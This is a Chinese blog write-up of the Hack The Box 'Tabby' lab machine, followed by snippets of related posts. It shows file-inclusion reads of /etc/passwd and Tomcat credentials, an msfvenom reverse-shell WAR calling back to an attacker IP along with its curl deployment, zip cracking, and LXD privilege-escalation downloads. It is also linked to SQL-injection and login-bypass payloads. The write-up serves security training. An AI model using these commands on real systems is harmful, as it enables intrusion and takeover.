Hack the box靶机 Tabby

最新推荐文章于 2022-08-10 11:49:16 发布
最新推荐文章于 2022-08-10 11:49:16 发布
阅读量383 收藏
点赞数
分类专栏: Hack the box
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38005854/article/details/108713778
版权

在这里插入图片描述

开放80和8080
查看一下

在这里插入图片描述
在这里插入图片描述

点击news时发生错误
看见?file=
可能有文件包含
先修改/etc/hosts 把10.10.10.194 megahosting.htb加入
在这里插入图片描述
在这里插入图片描述

再次访问
可以成功访问了
接下来测试是否是文件包含漏洞

在这里插入图片描述

访问/etc/passwd
发现用户ash

在这里插入图片描述

8080上市tomcat9
访问/usr/share/tomcat9/etc/tomcat-users.xml

在这里插入图片描述

tomcat登录账号
tomcat:$3cureP4s5w0rd123!

在这里插入图片描述

登录成功
tomcat操作手册

在这里插入图片描述

msfvenom -p java/shell_reverse_tcp LHOST=10.10.16.6 LPORT=4444 -f war -o shell.war  //生成exp
curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file shell.war "http://10.10.10.194:8080/manager/text/deploy?path=/shell.war"    //上传exp

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

发现一个.zip文件

在这里插入图片描述
在这里插入图片描述

下载后发现需要密码
fcrackzip爆破

在这里插入图片描述

没发现压缩包里有什么信息
到时admin@it可以当作ash的密码
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine
chmod +x build-alpine
./build-alpine
python -m SimpleHTTPServer 80

wget http://10.10.16.6/alpine-v3.12-x86_64-20200921_0435.tar.gz

在这里插入图片描述

没记录过程
给了链接吧
可以直接去看提权过程
提权方法

菜浪马废
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackthebox-tabby (LFI & tomcat9 渗透 & lxd 提权)
冬萍子癸水
01-17 613
C:\root> nmap -A 10.10.10.194 Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-16 15:49 CST Nmap scan report for 10.10.10.194 (10.10.10.194) Host is up (0.39s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh
Hack The Box——Tabby
江左盟的博客
07-14 1万+
简介 信息收集 使用nmap快速扫描端口,如图: 查看80端口web服务,如图: 发现一个地址,添加到hosts文件, 漏洞发现 尝试读取/etc/passwd 尝试使用相对路径 /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3..
Hack the box靶机 Lame
菜浪马废的博客
05-06 456
以为FTP会有东西呢 发现啥也没有 找一下samba 有漏洞 我看4.3的评分 可能会难 没想到啊没想到 这么简单 ****要是考试也这么简单就好了
Hack the box靶机 Blocky
菜浪马废的博客
05-25 305
发现: wordpress登录页面 phpmyadmin登录页面 一个用户名:notch uploads页面 两个文件 jar反编译工具(传送门) notch:PPPBiVoTj899ItS1EZnMhqeqVbrZI4Oq0/ 我他*了都 想骂人 之前root的密码 是north连ssh的 而现在我们拿到的这个 没个B用 提权很简单 直接就可以提权 我给想复杂了 还去看后台运行、检查文件、找内核 如果oscp考试的时候是这个难度就好了 try harder! ...
HTB-tabby
hee_mee的博客
08-24 495
zeronil
HackTheBox靶机系列之困难Reel
04-09
HackTheBox靶机系列之困难Reel 本篇文章主要介绍了Reel靶机的整个利用过程,从侦察到提权,涵盖了渗透测试、漏洞利用、信息收集等多个方面的知识点。 侦察阶段 在Reel靶机中,我们首先进行了侦察,扫描了21、22、...
Hack the box的Easy难度比较有价值的靶机.rar
11-04
"Hack the Box"(HTB)是一个在线平台,提供各种虚拟靶机,让安全专家和爱好者通过模拟真实世界的攻击场景来提升自己的技能。这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 ...
hack me please靶机攻略.docx
10-19
"hack me please靶机攻略" 本资源为一份详细的靶机攻略文档,涵盖了从主机发现到获取 root 权限的整个过程。下面是从文档中提取的关键知识点: 一、主机发现 * 使用 nmap 工具进行主机发现和端口扫描,命令为:...
平台的核心功能包括: 虚拟靶场: Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到
最新发布
06-22
Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到的各种系统配置和安全漏洞。 参与者需要利用自己的知识和工具来破解这些虚拟机,找到所谓的“flag”(通常是文本文件),并提交到...
平台的核心功能包括:虚拟靶场:Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到
06-22
Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到的各种系统配置和安全漏洞。 参与者需要利用自己的知识和工具来破解这些虚拟机,找到所谓的“flag”(通常是文本文件),并提交到...
HTB Walkthrough -- Tabby
sinat_36853972的博客
10-26 331
Tabby 信息收集 域名: megahosting.htb megahosting.com 端口: 8080 80 22 megahosting.htb URL Notes payloads /news.php?file=statement LFI file=…/…/…/…/etc/passwd 8080 Points Notes Web Sever Tomcat V9.0.31 Host Server Linux default Tomcat home
Hack the box靶机 October
菜浪马废的博客
05-25 294
搜了一下october 有漏洞 然后默认的后台是/backend 试了一下密码admin:admin 竟然进去了???? 有文件上传功能 shel.php 抓包 改成*.php5 右侧click here 拿到权限 dirb也扫出来后台了 但是我都已经不需要了 接下来是缓存区溢出了 正在看 所以就写到这吧 ...
Tabby 使用指南:跨平台Mac/linux/windows 替代putty, Xshell 一个高度可配置的现代化终端模拟器
weixin_42361393的博客
12-20 3614
Tabby 使用指南:一个高度可配置的现代化终端模拟器 Xpitz 0.493 2021.12.10 11:02:27 字数 838 阅读 961 文章首发于个人公号:「阿拉平平」 Tabby[1] 是一个基于 TypeScript 开发的终端模拟器,适用于 Windows,macOS 和 Linux。 该模拟器可高度配置,包括但不限于:主题、快捷键以及配色方案。本文将介绍 Tabby 的安装和使用方法。 下载安装 目前 Tabby 的最新版本为 1.0.164,可以到官网[2]、GitHub 或者公号后台
tabby原理分析
band_mmbx的博客
08-10 891
是一款基于实现的java静态代码分析工具,用于分析jar包,生成代码属性图。结合手工可以半自动地完成java反序列化链挖掘工作。我们从tabby的源代码进行分析,根据源代码的逻辑结构,可以看出其工作流程分成下面几个部分其中使用soot进行污点分析的部分是本文的重点。...
一些CMS网站系统漏洞,练手用(持续更新)
dibodang1423的博客
04-30 915
仅供拿shell,提权测试用,请勿恶意破坏 XuSoft系统: 后台万能密码:'or'='or' 可直接登陆,后台地址/manage/login.asp inurl:ReadArticlemb.asp?id= inurl:ReadBigClassmb.asp?id= inurl:ReadBigClassmbNews.asp?id= UPUPW绿色服务器平...
SSH介绍与神器Tabby
weixin_44211968的博客
01-06 1万+
本文介绍了什么是SSH、SSH的原理和使用。适合新手阅读。
Hackthebox入门
热门推荐
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
某小众CMS漏洞挖掘与实战
江左盟的博客
09-11 1万+
概述 在前段时间实战攻防演练中发现很多医院都使用同一个管理系统,网站后台都是同一路径:/adm/index.php,但是我从未见过,且页面没有任何Banner信息,如图: 通过许久的搜索终于找到了一些极其相似的源码,但都没有源码来源,其中有一套来自网软志成医院科室诊所门诊部网站系统源码,现在也下架了。还好我有备份:点击下载 环境搭建 运行环境使用Windows Server 2008 R2 64位和phpstudy进行搭建。部分源码已使用Zend加密,因此使用Zend解密工具进行解密,如图: 在安装过程
海洋seacms漏洞利用
xf555er的博客
04-16 3057
0x001-url采集 通过对海洋cms源码研究,找出含有标志性的网站目录(search.php?searchtype=),然后利用url采集工具批量采集seacms网站 0x002-漏洞payload payload:/`comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_w...
hack the box three
07-28
回答: 根据提供的引用内容,我了解到"Hack The Box"是一个在线平台,提供了一系列的虚拟机供用户进行渗透测试和漏洞利用的训练。根据引用\[1\]中的信息,可能涉及到nmap扫描、访问靶机地址、查看/etc/hosts、使用gobuster工具等操作。此外,引用\[2\]提到了一种利用fail2ban进行提权的方法,可以通过该链接了解更多细节。引用\[3\]中提到了读取/etc/passwd文件和尝试读取/home/michael/user.txt文件的尝试。请注意,这些信息仅供参考,具体的操作和步骤可能需要进一步的研究和实践。 #### 引用[.reference_title] - *1* [Hackthebox Three](https://blog.csdn.net/lixiangshidie/article/details/128482447)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Hackthebox Trikc攻略](https://blog.csdn.net/qq_44641654/article/details/127249782)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值